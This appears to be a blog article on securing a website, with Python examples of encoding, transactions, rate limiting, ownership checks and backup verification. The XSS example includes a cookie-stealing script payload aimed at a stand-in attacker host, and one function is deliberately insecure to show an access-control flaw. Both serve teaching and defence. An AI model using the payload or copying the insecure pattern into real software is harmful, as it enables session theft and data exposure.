How to protect the site? Ensuring the site’s information security

Ruslan
12 min read · Mar 23, 2021

Introduction

In this article we look at one important part of running a site: its information security. We define the main principles and threats and give recommendations for raising the site's level of security.

We will also touch on our web platform, Falcon Space, in the context of information security.

Principles. What to consider when ensuring the information security of the site

Security is defined by the weakest link

If your house has a massive steel door but the windows are always open, overall security is low. You can install antivirus software and close every port on the server, but if your users set the password 123456 and write it on a sticky note on the monitor, the risk of being hacked is very high.

Therefore, the focus should always be on whatever is the weakest link at the moment.

The economic rationale for hacking

Why does anyone hack a system? For some benefit. If the attack costs less than that benefit, it is worth the attacker's while. The task of defence is to make the attack unprofitable.

So the cost of an attack must be driven up. That cost is mainly the attacker's time and the hardware and software resources he has to spend.

What to protect on the site? Confidentiality, Integrity, and Availability

What can be wrong with the information on the site?

  • Data may leak: the confidentiality of the information is lost.
  • Data may be altered or destroyed: the information loses its integrity.
  • Information may become unavailable to the user: availability is lost.

All security measures are in one way or another aimed at ensuring the confidentiality, integrity or availability of information.

The human factor is the most delicate point in information security

People are weak. They have many temptations and vulnerabilities: someone can be bribed, someone can be intimidated, and someone will simply hand access to an attacker over the phone.

An insider is more dangerous to the system than a stranger off the street. He may have many reasons to help an attacker: a grudge at work, a promotion denied, a lucrative "side job", compromising material held against him, etc. Having access to the internal parts of the systems, such a person becomes the attacker's entry point into the system.

Threats to the site and appropriate measures

There is no need to fire a cannon at sparrows. Your protection must match the threat level and the attacker model. If the NSA is working against you, protecting yourself will probably take enormous resources (but then you surely have something worth protecting).

It is important to picture an approximate portrait of the attacker and his capabilities.

This lets you understand what the attacker can do, what goals he pursues (what he would gain from a successful hack) and which attack options he can carry out.

Continuity of the security state

The security system must operate continuously over time. It would look strange if the cash-in-transit guards transporting money all went to a cafe for lunch at 13:00, leaving the money in the van.

You need to provide for the factors that can "break" this continuity of the security state: the power goes out, the system administrator quits, a piece of software needs updating, a TLS certificate or encryption key expires and must be renewed.

Risk management approach — risks of information security of the site

Information security is essentially work with risks.

A risk combines the probability of a negative event and how critical that event would be for the business.

Evaluate each information security risk by its probability and its criticality (likelihood and impact). Then consider measures that reduce the likelihood and measures that reduce the impact.

Threats to the site across the CIA triad and measures to counter them

The first question is what is at stake. Who is the attacker, and why would he hack our site?

What will he gain? What hacking capabilities does he have? What budget can he allocate to the attack?

Understanding these questions lets you develop a more adequate set of measures to protect your site.

We will analyze the main protection measures against threats to the confidentiality, integrity and availability of information on the site. Some measures belong to several categories at once.

Confidentiality measures

TLS (HTTPS)

An HTTPS connection encrypts traffic between the browser and the server. This makes it much harder for an attacker sitting at an intermediate node to read the data (for example, to extract the user's password at login).

TLS also gives the user some assurance that he is talking to the right site: the browser verifies the server's certificate and shows whom it was issued to. The protocol is still commonly called SSL, but SSL itself is obsolete; a server today should offer only TLS 1.2 or later.

Protection against attacks on the web application (XSS, SQL injection)

A user can enter code through form fields, and that code can adversely affect the operation of the system.

For example, a stored XSS attack consists of submitting JavaScript that gets saved to the site's database (say, as a support ticket). Later another user (a support agent, for instance) loads that record from the database, and the malicious JS runs in that user's browser, with that user's session and privileges.

In Falcon Space, XSS protection is applied at the role level. Only the roles defined in the settings may save HTML markup in the system. For everyone else the markup is stored HTML-encoded, which does not allow embedding executable JS.
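The role-based encoding rule described above, as an added example in Python (it is not Falcon Space's own code; the role names, the in-memory ticket list and the attacker payload are constructed for illustration). A customer's ticket body is HTML-encoded before storage, so when a support agent's page is rendered the script tag is shown as text rather than executed; a trusted role keeps its markup intact.

```python
import html

# Assumed role names; the actual role configuration of Falcon Space is not shown on this page.
HTML_ALLOWED_ROLES = {"admin", "content_editor"}

tickets = []  # constructed in-memory stand-in for the support-tickets table


def store_ticket(author_role, body):
    """Store a ticket body; encode it unless the author's role may save raw HTML."""
    if author_role in HTML_ALLOWED_ROLES:
        stored = body
    else:
        # html.escape turns < > & " ' into entities, so the browser renders the
        # text literally instead of parsing it as markup.
        stored = html.escape(body, quote=True)
    tickets.append(stored)
    return stored


def render_ticket_list():
    """Build the HTML fragment that a support agent's browser would receive."""
    return "".join(f"<li>{body}</li>" for body in tickets)


def contains_active_script(fragment):
    """Crude check, used only to show the effect: is there a live <script> tag left?"""
    return "<script" in fragment.lower()


# Constructed stored-XSS payload that would exfiltrate the agent's cookies.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'

if __name__ == "__main__":
    store_ticket("customer", PAYLOAD)
    page = render_ticket_list()
    print(page)
    print("script survives:", contains_active_script(page))
```

Two caveats for practice. Encoding at storage time ties the data to an HTML context; if the same text is later placed into a JavaScript string or an attribute, it needs the encoding for that context, which is why many frameworks encode on output instead. And a role that is allowed to save raw HTML is exactly the account an attacker will try to phish, so consider an allowlist-based HTML sanitizer even for trusted roles.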

SQL injection: SQL fragments are introduced that alter the SQL executed on the server. This is very dangerous because it lets the attacker issue commands directly to the database (delete data, or read data from other tables). The protection is to execute all SQL through parameterized queries or parameterized stored procedures, never by concatenating user input into SQL text. Note that a stored procedure which itself assembles dynamic SQL from its parameters is still injectable.

In Falcon Space, all processing is based on stored procedures with parameters.

Software updates

Developers periodically find vulnerabilities in their software and release updates. If you do not apply them, there is a risk that the vulnerability will be exploited by attackers. The server and the software on it must be kept up to date.

Organizational measures and employee training

You can design business processes so as to reduce the likelihood of confidentiality and integrity breaches. One example is having payment documents created and signed by different people (separation of duties); this reduces the opportunity for abuse by either the cashier or the controller.

The second direction is training. People should know the site well and understand their role in its processes: what they may and may not do, which situations can arise and how they should respond to them.

Measures to ensure the integrity of information on the site

Transactions

If a set of operations must be executed as a single whole, they must be enclosed in one transaction, which is either fully executed or rolled back.

This matters for cases such as crediting funds to a balance. Within one transaction the payment status is changed, the user's balance is changed, and the operation is logged. If anything goes wrong, the system is left in a consistent state: it can never happen that the status was changed but the balance credit and the log entry did not occur.

The Falcon Space platform lets you edit the SQL scripts, so you can define transactions yourself to suit your needs.
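The balance top-up described above, as an added example in Python with SQLite (not Falcon Space's own SQL; the three tables and the pending payment are constructed). The three writes run inside one explicit transaction; a simulated crash between the balance update and the log insert rolls everything back, so the payment stays `pending` and the balance unchanged. The status check also makes a second application of the same payment fail, which is the guard against double crediting.

```python
import sqlite3


def make_db():
    """Constructed tables: one pending payment of 500 for alice, who has a balance of 100."""
    conn = sqlite3.connect(":memory:")
    conn.isolation_level = None  # autocommit mode: we issue BEGIN/COMMIT/ROLLBACK ourselves
    conn.executescript("""
        CREATE TABLE payments (id INTEGER PRIMARY KEY, user TEXT, amount INTEGER, status TEXT);
        CREATE TABLE balances (user TEXT PRIMARY KEY, balance INTEGER NOT NULL);
        CREATE TABLE audit_log (id INTEGER PRIMARY KEY, payment_id INTEGER, message TEXT);
        INSERT INTO payments VALUES (1, 'alice', 500, 'pending');
        INSERT INTO balances VALUES ('alice', 100);
    """)
    return conn


def apply_payment(conn, payment_id, fail_before_log=False):
    """Mark the payment paid, credit the balance and write the audit row atomically.

    Returns True on commit, False if anything failed and the transaction was rolled back.
    fail_before_log simulates a crash after two of the three writes."""
    try:
        conn.execute("BEGIN")
        row = conn.execute(
            "SELECT user, amount, status FROM payments WHERE id = ?", (payment_id,)
        ).fetchone()
        if row is None or row[2] != "pending":
            raise ValueError("payment missing or already processed")
        user, amount, _ = row
        conn.execute("UPDATE payments SET status = 'paid' WHERE id = ?", (payment_id,))
        conn.execute("UPDATE balances SET balance = balance + ? WHERE user = ?", (amount, user))
        if fail_before_log:
            raise RuntimeError("simulated crash between balance update and log write")
        conn.execute(
            "INSERT INTO audit_log (payment_id, message) VALUES (?, ?)",
            (payment_id, f"credited {amount} to {user}"),
        )
        conn.execute("COMMIT")
        return True
    except Exception:
        conn.execute("ROLLBACK")  # undo every write made since BEGIN
        return False


def snapshot(conn):
    """(payment status, alice's balance, number of audit rows) for inspection."""
    status = conn.execute("SELECT status FROM payments WHERE id = 1").fetchone()[0]
    balance = conn.execute("SELECT balance FROM balances WHERE user = 'alice'").fetchone()[0]
    log_rows = conn.execute("SELECT COUNT(*) FROM audit_log").fetchone()[0]
    return status, balance, log_rows


if __name__ == "__main__":
    conn = make_db()
    print(apply_payment(conn, 1, fail_before_log=True), snapshot(conn))  # False ('pending', 100, 0)
    print(apply_payment(conn, 1), snapshot(conn))                        # True  ('paid', 600, 1)
```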

Data integrity control via scripts

The data in the system should be checked periodically. The site code may contain bugs that lead to integrity violations. Write a set of scripts that check the data in the tables against the business rules, run them daily to find inconsistencies, and e-mail a report.

The Falcon Space platform has a similar report for slow queries: the script that searches for problematic queries runs daily and sends a short report by mail.

Correct data structure in the database

If the database structure has problems, data integrity can be compromised when data is updated only partially. Use an adequate level of normalization, impose constraints (NOT NULL, CHECK, UNIQUE), set foreign keys, etc., so that the database itself rejects inconsistent writes.
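Both of the points above (constraints that stop bad writes, and a daily script that finds inconsistencies that got through anyway) in one added Python/SQLite example; the schema, the sample rows and the two check queries are constructed and are not Falcon Space's. The schema's foreign key and CHECK constraints reject an order for a non-existent customer and a negative total, while the check queries report an order whose stored total disagrees with its line items and orders that have no items at all.

```python
import sqlite3

# Constructed schema with declarative integrity rules.
SCHEMA = """
CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
CREATE TABLE orders (
    id INTEGER PRIMARY KEY,
    customer_id INTEGER NOT NULL REFERENCES customers(id),
    total INTEGER NOT NULL CHECK (total >= 0)
);
CREATE TABLE order_items (
    id INTEGER PRIMARY KEY,
    order_id INTEGER NOT NULL REFERENCES orders(id),
    price INTEGER NOT NULL CHECK (price >= 0),
    qty INTEGER NOT NULL CHECK (qty > 0)
);
INSERT INTO customers VALUES (1, 'alice');
INSERT INTO orders VALUES (1, 1, 300), (2, 1, 999);   -- order 2 is deliberately inconsistent
INSERT INTO order_items VALUES (1, 1, 100, 3);
"""

# Business-rule checks; each returns the ids of offending rows.
INTEGRITY_CHECKS = {
    "order_total_mismatch": """
        SELECT o.id FROM orders o
        LEFT JOIN order_items i ON i.order_id = o.id
        GROUP BY o.id
        HAVING o.total != COALESCE(SUM(i.price * i.qty), 0)
        ORDER BY o.id
    """,
    "empty_orders": """
        SELECT o.id FROM orders o
        WHERE NOT EXISTS (SELECT 1 FROM order_items i WHERE i.order_id = o.id)
        ORDER BY o.id
    """,
}


def make_db():
    conn = sqlite3.connect(":memory:")
    # SQLite enforces foreign keys only when asked, and only per connection.
    conn.execute("PRAGMA foreign_keys = ON")
    conn.executescript(SCHEMA)
    return conn


def insert_order(conn, customer_id, total):
    """True if the row was accepted, False if a constraint rejected it."""
    try:
        conn.execute("INSERT INTO orders (customer_id, total) VALUES (?, ?)", (customer_id, total))
        return True
    except sqlite3.IntegrityError:
        return False


def run_integrity_checks(conn):
    """Run every check; return {check name: [offending ids]} for the daily report."""
    report = {}
    for name, sql in INTEGRITY_CHECKS.items():
        bad_ids = [row[0] for row in conn.execute(sql)]
        if bad_ids:
            report[name] = bad_ids
    return report


if __name__ == "__main__":
    conn = make_db()
    print(run_integrity_checks(conn))          # order 2 flagged by both checks
    print(insert_order(conn, 42, 10))          # False: no such customer
    print(insert_order(conn, 1, -5))           # False: CHECK (total >= 0)
```

In production the report would be the body of the daily e-mail; an empty dictionary means a quiet day.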

Search and fix software errors (prevention, support)

It is naive to think that you develop a site once and it will then run smoothly without support, without hosting administration, etc.

If the site was actually developed rather than assembled from ready-made blocks, it may contain bugs, and they may surface not immediately but during operation.

Preventive maintenance of the application is needed: look at the logs, analyze performance, look for problem points.

This affects both the quality of the site and its security: such reviews can reveal gaps that did not manifest themselves in any way during development.

Measures to ensure the availability of the site

DoS protection

A DoS attack is the organization of a flood of requests to a site in order to overload it. The result is a denial of service: the server simply can no longer cope with the load. When the flood comes from many machines at once, it is a DDoS.

Protection against DoS attacks rests primarily with the hoster. Ask your hoster what protection against DoS attacks it provides.

You can also rate-limit or block suspicious IP addresses, so that your server simply does not process some of the requests. The main thing is not to overdo it: you can weed out real users along with the bots (programs that visit the site), especially where many users share one address behind NAT or a corporate proxy.
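A per-IP sliding-window rate limiter with an allowlist, as an added example (not part of the original article or the Falcon Space platform; the access-log lines are constructed). Replaying the sample log with a limit of 5 requests per 60 seconds throttles only the sixth burst request from the noisy address and lets the same address through again once its window has emptied; putting that address on the allowlist (a known partner or a shared office egress) throttles nothing, which is the "don't overdo it" safeguard.

```python
from collections import defaultdict, deque

# Constructed access-log lines: "<epoch seconds> <client ip> <path>".
SAMPLE_LOG = """\
1000 203.0.113.7 /catalog
1000 203.0.113.7 /catalog
1001 198.51.100.2 /login
1001 203.0.113.7 /catalog
1002 203.0.113.7 /catalog
1002 203.0.113.7 /catalog
1003 198.51.100.2 /catalog
1003 203.0.113.7 /catalog
1070 203.0.113.7 /catalog
""".splitlines()


class SlidingWindowLimiter:
    """Allow at most max_requests per client within any window_seconds span."""

    def __init__(self, max_requests, window_seconds, allowlist=()):
        self.max = max_requests
        self.window = window_seconds
        self.allowlist = set(allowlist)   # addresses that are never throttled
        self.hits = defaultdict(deque)    # ip -> timestamps of recent accepted requests

    def check(self, ip, ts):
        """Record a request; True if it should be served, False if throttled."""
        if ip in self.allowlist:
            return True
        q = self.hits[ip]
        while q and ts - q[0] >= self.window:   # drop timestamps outside the window
            q.popleft()
        if len(q) >= self.max:
            return False
        q.append(ts)
        return True


def replay(lines, limiter):
    """Run the limiter over log lines; return the requests it would have throttled."""
    blocked = []
    for line in lines:
        ts, ip, path = line.split()
        if not limiter.check(ip, int(ts)):
            blocked.append((int(ts), ip, path))
    return blocked


if __name__ == "__main__":
    print(replay(SAMPLE_LOG, SlidingWindowLimiter(max_requests=5, window_seconds=60)))
    print(replay(SAMPLE_LOG, SlidingWindowLimiter(5, 60, allowlist={"203.0.113.7"})))
```

One caveat: behind a CDN or reverse proxy the socket address is the proxy's, so the client address must be taken from a forwarding header, and only when the request really came from your trusted proxy; otherwise an attacker can spoof the header and either evade the limit or get other users throttled.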

Load testing

Run load tests and find the problem areas in your website. What works well at low volume can be very slow under high load.

An example of such a test: load testing of the Falcon Space catalog via Loader.io.

Backup Server

If the main server fails completely, it is good to be able to quickly restore the application on a backup server. Ideally, run several servers together so that when one fails, requests go to another.

Availability monitoring and alerts

If the site goes down, you need to know about it as early as possible in order to take all measures to restore it immediately. Monitoring tools that poll the site are used for this; on failure they report the problem by email or SMS. An example of a free site-availability monitoring service: https://uptimerobot.com/

Recommendations for ensuring the information security of the site

Passwords

Use complex passwords that are nevertheless easy to remember, so that the user does not write them down on a piece of paper. Example: Kata007pulta* contains a special character, digits, upper case and more than 8 characters. Such a password is hard to guess but easy for the user to remember. Do not reuse it on other sites.

Periodically change important passwords. If you must store passwords, keep them in a password manager (an encrypted vault), not in a spreadsheet inside a password-protected archive on your PC.

Minimal access and remove all unnecessary elements

Each user must have the minimum level of access sufficient for their work. Do not give more than the job requires. Any element of your system can be attacked from outside, and the fewer capabilities that element has, the better.

Block access to unused ports on the server. Every open port is a potential entry point for an attacker.

Updates

Install updates in a timely manner. Set up a schedule for updating the main software: the server OS and services, the site's CMS, antivirus, etc.

Insiders

An insider is much more dangerous than an outside attacker. He already has access to the system, other people in the system trust him, and he can quietly damage the system for a long time. Create conditions in which people are satisfied, part with everyone amicably, and do not leave debts to others (especially to programmers and system administrators). Revoke access promptly when someone leaves.

The more complex the solution, the more holes and errors there are

Complexity goes hand in hand with bugs. The more code and the more features there are, the more bugs there can be.

And bugs are a risk factor for hacking. Reduce the complexity of the system. As it develops it will become more complex for natural reasons (lots of data, mandatory user wishes, etc.), so do not complicate everything with your own hands at the early stages.

Use the basics of risk management

Review the risks and the measures that reduce their criticality and probability.

Risks are not set in stone. Once you have done some work to reduce them, review them again and shift your attention to other risks.

Do not share unnecessary information

An external attacker first collects information from open sources. Bit by bit he looks for vulnerabilities, studies the structure of the system and the possible entry points into it.

Do not publish information that helps an attacker (software versions, internal hostnames, stack traces in error pages). This reduces the chance of being hacked from outside.

Don't install unnecessary software on your phone or PC

On workstations (and even more so on servers) there should be no unnecessary software. Every extra program is a potential way to pick up a virus or other malware.

Vulnerabilities in that software can also become an entry point into the system.

Therefore, install applications only from trusted sources and give these applications the minimum necessary rights.

For programmers: do not trust user input

When the site processes a request from the browser, the data received from the user cannot be trusted, and that includes hidden fields, cookies and URL parameters, not just the text typed into forms.

In the Falcon Space platform almost every procedure accepts a @username parameter that is set inside the system from the authenticated session, not received from the browser. This is what we rely on when authorizing access to specific resources.

For example, a getOrder request arrives with an OrderID parameter. Can we simply return the order by OrderID? No, because the user could specify someone else's OrderID. First we must check (by @username) whether the current user has access to this object.
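The getOrder check, as an added example in Python with SQLite (not Falcon Space's stored procedure; the orders table and the owner column are constructed). The unchecked version returns any order whose id the browser supplies; the checked version takes the username from the session, never from the request, and puts the ownership condition into the query itself, so a foreign OrderID yields nothing. Returning the same "not found" result for a missing order and for someone else's order avoids confirming to an attacker that the id exists.

```python
import sqlite3


def make_db():
    """Constructed orders table: alice owns order 1, bob owns order 2."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, owner TEXT NOT NULL, total INTEGER)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", [(1, "alice", 120), (2, "bob", 80)])
    return conn


def get_order_unchecked(conn, order_id):
    """Deliberately insecure: trusts the id from the browser (insecure direct object reference)."""
    return conn.execute(
        "SELECT id, owner, total FROM orders WHERE id = ?", (order_id,)
    ).fetchone()


def get_order(conn, username, order_id):
    """Secure: username comes from the server-side session (the @username idea),
    and the ownership check is part of the query. None for missing or foreign orders."""
    return conn.execute(
        "SELECT id, owner, total FROM orders WHERE id = ? AND owner = ?",
        (order_id, username),
    ).fetchone()


if __name__ == "__main__":
    conn = make_db()
    session_user = "alice"           # in a real site: taken from the authenticated session
    requested_id = 2                 # in a real site: taken from the request, attacker-controlled
    print(get_order_unchecked(conn, requested_id))        # (2, 'bob', 80): leaked
    print(get_order(conn, session_user, requested_id))    # None: denied
```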

Backups, backups, backups!

Make backups of the database and site files, daily. Copy them to remote storage (Yandex.Disk or Dropbox) so that if the server burns down, your backups survive. Encrypt the copies before uploading them, since they contain exactly the confidential data this article is about.

Periodically check that backups are actually being made and are usable. It can happen that backups are made but are damaged and cannot be used, or that they are truncated and do not allow a full restore. The only real check is a test restore.
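A backup-and-verify routine, as an added example in Python with SQLite standing in for the site's database (not part of the original article or of Falcon Space; the sample table and the simulated truncation are constructed). The backup is taken with SQLite's online backup API and its SHA-256 recorded; verification recomputes the checksum, opens the copy read-only, runs the engine's integrity check and compares row counts with what the live system reported. A copy truncated in transit fails the checksum step, which is exactly the "backups are made but unusable" case the text warns about.

```python
import hashlib
import os
import sqlite3
import tempfile


def make_live_db(path):
    """Constructed stand-in for the production database: two users."""
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
    conn.commit()
    return conn


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def backup_database(live_conn, backup_path):
    """Consistent online copy via the SQLite backup API; returns the copy's SHA-256,
    which should be stored separately from the copy itself (e.g. in the backup log)."""
    dest = sqlite3.connect(backup_path)
    live_conn.backup(dest)
    dest.close()
    return sha256_of(backup_path)


def verify_backup(backup_path, expected_sha256, expected_counts):
    """Restore test. Returns (ok, reason)."""
    if sha256_of(backup_path) != expected_sha256:
        return False, "checksum mismatch: copy is damaged or was tampered with"
    try:
        conn = sqlite3.connect(f"file:{backup_path}?mode=ro", uri=True)
        try:
            if conn.execute("PRAGMA integrity_check").fetchone()[0] != "ok":
                return False, "integrity_check failed"
            for table, want in expected_counts.items():
                # Table names come from our own config, never from user input.
                got = conn.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]
                if got != want:
                    return False, f"{table}: expected {want} rows, found {got} (truncated backup?)"
        finally:
            conn.close()
    except sqlite3.DatabaseError as exc:
        return False, f"cannot open backup: {exc}"
    return True, "ok"


def demo():
    """Back up, verify, then damage the copy and verify again.
    Returns (first verification ok, second verification ok, second reason)."""
    with tempfile.TemporaryDirectory() as d:
        live_path = os.path.join(d, "site.db")
        backup_path = os.path.join(d, "site-backup.db")
        live = make_live_db(live_path)
        digest = backup_database(live, backup_path)
        good = verify_backup(backup_path, digest, {"users": 2})
        with open(backup_path, "r+b") as f:   # simulate a truncated upload
            f.truncate(100)
        bad = verify_backup(backup_path, digest, {"users": 2})
        live.close()
        return good[0], bad[0], bad[1]


if __name__ == "__main__":
    print(demo())   # (True, False, 'checksum mismatch: ...')
```

Run the verification on a machine other than the one that made the backup: that also proves the remote copy is retrievable and that the restore procedure works without the original server.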

Support and control regulations

The system administrator carries it out: checks critical server parameters (memory, disk space, CPU), studies system logs, performs software updates, and monitors site and database backups.

Prevention regulations for the application

This procedure can be carried out by the developer on support. It is necessary to study the application error log, diagnose the errors and enter what needs fixing into the bug tracker.

It also makes sense to run performance diagnostics, look for slow queries and optimize them.

Scheduled password updates

Schedule password changes for the important entry points: the database connection, hosting control panels, server access, billing accounts, etc. Rotate them immediately when someone who knew them leaves.

Regulations for reviewing the composition of threats and related measures (risk management)

At least once every six months, it makes sense to return to the information security risks and update the measures and regulations so that they adequately address newly identified threats.

Conclusion

Information security requires time and money, and there is no visible return from it: something was done and implemented, and there is no direct benefit to show.

But there are risks that can eventually cause enormous damage. With a modest effort (the Pareto 20%) you can provide a significant degree of site security and make it much harder for an attacker to break in (i.e. protect yourself from roughly 80% of attacks).

Start with the minimum security basics, iteratively adding new elements as needed.

There is a fitting formulation of Murphy's law: "Anything that can go wrong will go wrong."

Its point is not that you will be hacked, but that someone will be hacked at some point. Whether it is your site or someone else's, tomorrow or in a year, it will definitely happen.

Originally published at https://falconspace.site.
